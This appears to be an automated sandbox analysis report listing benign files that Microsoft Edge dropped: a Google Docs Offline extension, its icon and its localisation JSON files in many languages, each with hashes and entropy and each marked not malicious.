                                                                                                                                                                                                                                                                                      Preview:{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):154477
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                      MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                      SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                      SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                      SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4982
                                                                                                                                                                                                                                                                                      Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                      MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                      SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                      SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                      SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):908
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                      MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                      SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                      SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                      SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1285
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                      MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                      SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                      SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                      SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1244
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                      MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                      SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                      SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                      SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                      MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                      SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                      SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                      SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3107
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                      MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                      SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                      SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                      SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1389
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                      MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                      SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                      SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                      SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1763
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                      MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                      SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                      SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                      SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):930
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                      MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                      SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                      SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                      SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):913
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                      MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                      SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                      SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                      SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):806
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                      MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                      SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                      SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                      SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):883
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                      MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                      SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                      SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                      SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                      MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                      SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                      SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                      SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1613
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                      MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                      SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                      SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                      SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):848
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                      MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                      SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                      SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
